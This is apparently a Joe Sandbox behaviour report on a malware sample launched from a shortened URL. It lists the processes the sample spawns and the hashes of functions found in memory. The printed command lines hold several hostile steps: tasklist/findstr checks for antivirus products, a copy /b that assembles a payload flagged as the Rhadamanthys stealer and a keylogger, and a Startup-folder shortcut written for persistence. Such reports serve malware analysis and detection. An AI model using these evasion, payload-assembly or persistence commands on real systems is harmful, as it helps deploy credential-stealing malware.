Start time:	08:14:02
Start date:	21/02/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:14:03
Start date:	21/02/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1952,i,13972747378656180607,2639153371829192782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	08:14:05
Start date:	21/02/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:14:10
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Roaming\ClassroomEc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ClassroomEc.exe"
Imagebase:	0xa70000
File size:	1'212'711 bytes
MD5 hash:	956D074F7C6BD174C43586F07892E820
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs Detection: 49%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:14:10
Start date:	21/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:14:12
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:14:12
Start date:	21/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:14:12
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x840000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:14:13
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0x170000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:14:13
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x840000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:14:13
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0x170000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:14:17
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 30253
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:14:17
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pif
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:14:17
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Conf 30253\m
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:14:17
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif
Wow64 process (32bit):	true
Commandline:	30253\Identification.pif 30253\m
Imagebase:	0x8d0000
File size:	946'784 bytes
MD5 hash:	848164D084384C49937F99D5B894253E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2951803005.0000000000360000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2953940198.00000000088F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 5%, ReversingLabs Detection: 4%, Virustotal, Browse
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	08:14:18
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 localhost
Imagebase:	0x7f0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:14:42
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 061F0FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2003937344.00000000061F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_61f0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 04bbfa85f7692fe6ce31a57d65cad234852fc268d32278ed5f81ea11f5514095
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 061F0FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2003937344.00000000061F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_61f0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 04bbfa85f7692fe6ce31a57d65cad234852fc268d32278ed5f81ea11f5514095
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 061F0FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2003937344.00000000061F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_61f0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 04bbfa85f7692fe6ce31a57d65cad234852fc268d32278ed5f81ea11f5514095
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 4820, Parent PID: 5444COMMON

Executed Functions

Function 04F33FE0 Relevance: 1.0, Instructions: 954COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1a7979b91334eb39aa9bad0bb514eb7dd7c8d180ba614288a561e409a248d19
Instruction ID: 76262a4e4efc84151af2d9996b94e244a75bc8fe185bad1c334833e263de6b79
Opcode Fuzzy Hash: d1a7979b91334eb39aa9bad0bb514eb7dd7c8d180ba614288a561e409a248d19
Instruction Fuzzy Hash: 29924974A012599FDB05DFA8D484A9DFFB2FF89314F258199E844AB361C731ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F34F98 Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c109d3e514f508ff960384b443c798615b255bd4e7063d12f5c5657c56c8230
Instruction ID: e4854ce49b6c22eef34ce64904485b8c508dbb4fb174030ab7c42294a90fc235
Opcode Fuzzy Hash: 2c109d3e514f508ff960384b443c798615b255bd4e7063d12f5c5657c56c8230
Instruction Fuzzy Hash: 97F14C74A00259EFCB15CF98C494AAEBBF2FF88314F258559E805AB355C731ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F33090 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4319ee1633986be097694f0e9e758af74ccc415974b07fe1463a7531a6107e
Instruction ID: 2fa9b5ba3c21425ae5ca36a30d8701de48c8573aecd07af7e353e09526365d1a
Opcode Fuzzy Hash: ab4319ee1633986be097694f0e9e758af74ccc415974b07fe1463a7531a6107e
Instruction Fuzzy Hash: AEC10870A092858FC706CF6CC8A49EEBFB1EF46310B194596D854DB2A2C735FC46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F352E1 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec58df07ddab861223236d324874f1a6f383e088dcdb5fdd5a2836466d986f7f
Instruction ID: 454723226d9e29d6806a89cc8e99279eccf1627c1b5ced7448ca2fe4fef7bc82
Opcode Fuzzy Hash: ec58df07ddab861223236d324874f1a6f383e088dcdb5fdd5a2836466d986f7f
Instruction Fuzzy Hash: 7951C474A00209EFDB05CFA8D484A9DBBF2FF88314F258559E805AB365C775ED92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F341F1 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497f68a32cfbdb3280453763d8435527ac4a437187ff5ad436e0f151f1062120
Instruction ID: f0a1315f0d5e87e4b284995cf6961b5a87723e531e6d88821bffad13ef514f7c
Opcode Fuzzy Hash: 497f68a32cfbdb3280453763d8435527ac4a437187ff5ad436e0f151f1062120
Instruction Fuzzy Hash: F141E534A00219EFDB15DFA8D484A9DFBB2FF88314F248559E804AB365C731ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F331A1 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f1e274977c46ba8149a8572d5cde846ed48b27e27951a18c3bf9d616d8a37a5
Instruction ID: f6cfcffcaacec057f2f274586b696679e0c1b238839785aad424008b40171953
Opcode Fuzzy Hash: 9f1e274977c46ba8149a8572d5cde846ed48b27e27951a18c3bf9d616d8a37a5
Instruction Fuzzy Hash: 744139B4A006459FCB09CF98C4949AEFBB1FF48310B2586A9D815AB365C736FC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F34F88 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4213151d2a3c02f9ef6dfc61617444ae7ff248d5d1e6f4ab0470d59f1912905b
Instruction ID: 7da545747b408088d158195b60f1cf75a287295d7b2e93ebe6671b1d0d0bdd0f
Opcode Fuzzy Hash: 4213151d2a3c02f9ef6dfc61617444ae7ff248d5d1e6f4ab0470d59f1912905b
Instruction Fuzzy Hash: C8412CB4A002459FCB14CF9CC4949AEBBF1EF88310B248659E955EB3A5C336EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F33AE8 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9105347e4095761e0d728163d44038e6e6b47f10a7b25f7344a6d0b3fe860e
Instruction ID: d93669bde838eea2fb7c7efc0f0ba026ef06ed50401f8409b892a5e59a7863be
Opcode Fuzzy Hash: ec9105347e4095761e0d728163d44038e6e6b47f10a7b25f7344a6d0b3fe860e
Instruction Fuzzy Hash: BF313A74A042499FCB41DF5CC8949AEBBB1FF49310B1584AAD849EB362C735AC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F33B0C Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d8fea04a9930aaddccb1be37cc3c5fcb42ac4541027569a5f70cd5af7fa1e3
Instruction ID: 44edadfeb17ba2bf278752b4351be2ea068c87f09c7ca31f76dfc287539e55c9
Opcode Fuzzy Hash: e1d8fea04a9930aaddccb1be37cc3c5fcb42ac4541027569a5f70cd5af7fa1e3
Instruction Fuzzy Hash: C6313774A042099FCB01DF58C8909AABBB1FF49310B158596E909EB352C735FC51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F35400 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90542a096f50699b985d7c6316c5635c19b0944d6577f1621e73f0e3848c58ac
Instruction ID: 23d07e01559aef954c8feb79e15228b94eca1d932308598641b36382e36c7465
Opcode Fuzzy Hash: 90542a096f50699b985d7c6316c5635c19b0944d6577f1621e73f0e3848c58ac
Instruction Fuzzy Hash: B611F935A04209EFDB05CF98D484A9DBBB2FF88314F289548E804AB361C775E882CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04F342EC Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65e3cf91a028abf886a18547f83143654b84bc44c0ce353763fd02ec2f57738e
Instruction ID: 095feec6d8ddfeb761de5cd43e67e45c338324028c0419fa166c7618c4299586
Opcode Fuzzy Hash: 65e3cf91a028abf886a18547f83143654b84bc44c0ce353763fd02ec2f57738e
Instruction Fuzzy Hash: 5B11CB74A04209EFDB45CBA8D484E9DFBB2FF48314F288559E805AB365C775E982CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04E4D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2165632835.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e4d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10dc4839232f3d46ec902cc60bb0932ff6db154aae1580750e04e95a60fff365
Instruction ID: 0f9b8d3f5cdff0b09ffd651229d1c19f5371f994861877778e257fb7ed364c5a
Opcode Fuzzy Hash: 10dc4839232f3d46ec902cc60bb0932ff6db154aae1580750e04e95a60fff365
Instruction Fuzzy Hash: 5F015E6140E3C05FD7128B259D94B52BFB4DF83224F1DC1DBE8888F1A3C269984ACB72

Uniqueness

Uniqueness Score: -1.00%

Function 04E4D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2165632835.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e4d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b8a67a78b6a2dbbcef9bd7b49e4722ad630366f04806378baf6aa0a302f086
Instruction ID: 2d5cce92da06c6347bd3cf4399ad391bee5bd8a58b33a0cc5814228ae2312ac9
Opcode Fuzzy Hash: 98b8a67a78b6a2dbbcef9bd7b49e4722ad630366f04806378baf6aa0a302f086
Instruction Fuzzy Hash: C50126715043409AE7108E29FCC4F67BF98DFC1324F1CC51AEC084B242C378A846DAB1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 4408, Parent PID: 4820COMMON

Executed Functions

Function 04D5FAD8 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673cddaf34e605fac91650a9ee817d95c569fbf0e2b70ae7e11f4e4f03e113c5
Instruction ID: a3a2e040ce75ed6bf039e624f47a980d2364cda3fcc843f1f419eda4ba9a3fcd
Opcode Fuzzy Hash: 673cddaf34e605fac91650a9ee817d95c569fbf0e2b70ae7e11f4e4f03e113c5
Instruction Fuzzy Hash: BB91BF75B017145FEB29EFB484005AFB7B2EF84A04B00892DE55AAF350DF34A906CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 04D5FAE8 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a53b535c7157b0e1d3d262541e4e6e8c2c03fdeea9544f489bba778e6996c8a
Instruction ID: fe9b3b382d4c77ea96459ba10f2aeda118d5d3b2a44ebd622c3eeb9568a8b877
Opcode Fuzzy Hash: 8a53b535c7157b0e1d3d262541e4e6e8c2c03fdeea9544f489bba778e6996c8a
Instruction Fuzzy Hash: E9919E75B017155BEB29EFB484005AFB7B2EF84A04B00892DE55AAF350DF34A906CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 07A92800 Relevance: 10.6, Strings: 8, Instructions: 628COMMON

Download Yara Rule

Strings

4']q, xrefs: 07A92B11
|,`h, xrefs: 07A92AD3
pi^h, xrefs: 07A92A7A
pi^h, xrefs: 07A92898
pi^h, xrefs: 07A9290E
pi^h, xrefs: 07A9285B
4']q, xrefs: 07A92B05
pi^h, xrefs: 07A928A8

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$pi^h$pi^h$pi^h$pi^h$pi^h$|,`h
API String ID: 0-2376590843
Opcode ID: 1b11b765cfcc3a8ed75212f24295821246d72ae7615ea7bf5d2c50564d947b27
Instruction ID: 6566deb474c6e80340684bece024abb5aa8af48c5ca863a8fa1b0c10dfac2af2
Opcode Fuzzy Hash: 1b11b765cfcc3a8ed75212f24295821246d72ae7615ea7bf5d2c50564d947b27
Instruction Fuzzy Hash: 8F22E8B1710206AFDF249F69C4447AABBE5BFC9321F04807AD525CB281DB31D965C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 07A97810 Relevance: 7.8, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07A979A9
tP]q, xrefs: 07A9799D
$]q, xrefs: 07A97A23
$]q, xrefs: 07A97A33
,esq, xrefs: 07A97A6F
$]q, xrefs: 07A978B9

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: ,esq$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-1987180081
Opcode ID: 1ff967156eb0c83038c303129dc997a91cabf76be35f238c247ea607f61b8459
Instruction ID: 71368203f6558484b57dfd4ef956a654c81179d70e7f765759e35f5f0e88c8ef
Opcode Fuzzy Hash: 1ff967156eb0c83038c303129dc997a91cabf76be35f238c247ea607f61b8459
Instruction Fuzzy Hash: C791C3B07202069FDF159F698450A6ABBF2AFC9710F14C4BAE8259B351CB31DD51CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 07A94110 Relevance: 5.6, Strings: 4, Instructions: 576COMMON

Download Yara Rule

Strings

4']q, xrefs: 07A9444E
4']q, xrefs: 07A945A8
4']q, xrefs: 07A945B2
4']q, xrefs: 07A94458

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 65381ce988aac7ff0e5b39d25f6aee512b91cc316cb586e0403f6e023c21bd51
Instruction ID: 0a94d129136a982db6232b523d636919795a0127f95f605ade45519d61e23fb8
Opcode Fuzzy Hash: 65381ce988aac7ff0e5b39d25f6aee512b91cc316cb586e0403f6e023c21bd51
Instruction Fuzzy Hash: 200208F1B043569FDF249B68881076BBBE6AFD9311F14C07AD525CB251DB31C8A2C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 07A97595 Relevance: 5.1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

$]q, xrefs: 07A97600
$]q, xrefs: 07A975F4
4']q, xrefs: 07A97627
4']q, xrefs: 07A9761B

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: e9ff0ca4aa408f8d45d11c18dd7f2d67f02394ab1b5689ec80d9856af3d2471e
Instruction ID: dc6a5c695554c835554196dfe3ad7744d224c4c51b644841b0adce5d9f0a774d
Opcode Fuzzy Hash: e9ff0ca4aa408f8d45d11c18dd7f2d67f02394ab1b5689ec80d9856af3d2471e
Instruction Fuzzy Hash: FD21F6F172420A9BDF29562D98102A9B7F2AFD5621F24807BC561CB245DF32C872C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 07A97805 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07A9799D
$]q, xrefs: 07A97A23
$]q, xrefs: 07A978B9

Memory Dump Source

Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$$]q$$]q
API String ID: 0-1297184269
Opcode ID: 466af971789e8daabb695d14b76450ec9ccb4d1d48990658d2445dfb91b48c19
Instruction ID: 52d11297fab1875c789e931d5bae85cc527308c980fdf2f9c3b328a353c478a3
Opcode Fuzzy Hash: 466af971789e8daabb695d14b76450ec9ccb4d1d48990658d2445dfb91b48c19
Instruction Fuzzy Hash: B0518CB0B20206DBDF25CF69C444BA9B7E2ABC4611F18C4B5E8259B251CB31DD91CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04D56DD8 Relevance: 3.2, Strings: 2, Instructions: 669COMMON

Download Yara Rule

Strings

LR]q, xrefs: 04D56E85
(Xbq, xrefs: 04D56F67

Memory Dump Source

Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: (Xbq$LR]q
API String ID: 0-655927778
Opcode ID: fc36106ada45974e67a0779f4d7c32dcb2525819235b4e005172044aa0426283
